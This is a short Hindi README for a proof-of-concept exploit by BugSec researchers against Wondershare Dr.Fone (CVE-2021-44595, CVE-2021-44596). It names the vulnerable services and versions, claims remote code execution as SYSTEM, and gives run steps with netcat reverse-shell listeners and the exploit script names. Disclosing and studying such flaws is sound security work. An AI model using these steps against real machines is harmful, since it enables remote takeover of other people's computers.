
Wondershare Dr.Fone में CVE-2021-44595 और CVE-2021-44596 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो असुरक्षित सेवाओं के माध्यम से SYSTEM के रूप में दूरस्थ कोड निष्पादन को सक्षम बनाता है।
नेतनेल कोहेन और टोमर पेलेड, BugSec के सुरक्षा शोधकर्ता।
Wondershare Dr.Fone का शोषण करने के लिए POC उदाहरण।
Dr.Fone, wondershare द्वारा विकसित एक फ़ोन टूलकिट है, और RCE के लिए संवेदनशील है।
केवल नेटवर्क एक्सेस के साथ, हम SYSTEM उपयोगकर्ता के रूप में रिमोट कोड निष्पादित करने में सफल होते हैं।
संवेदनशील सेवाएँ:
InstallAssistService.exe
ElevationService.exe
परीक्षित संस्करण: 12.0.7 , 11.4
IP और पोर्ट बदलें और निष्पादित करें।
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py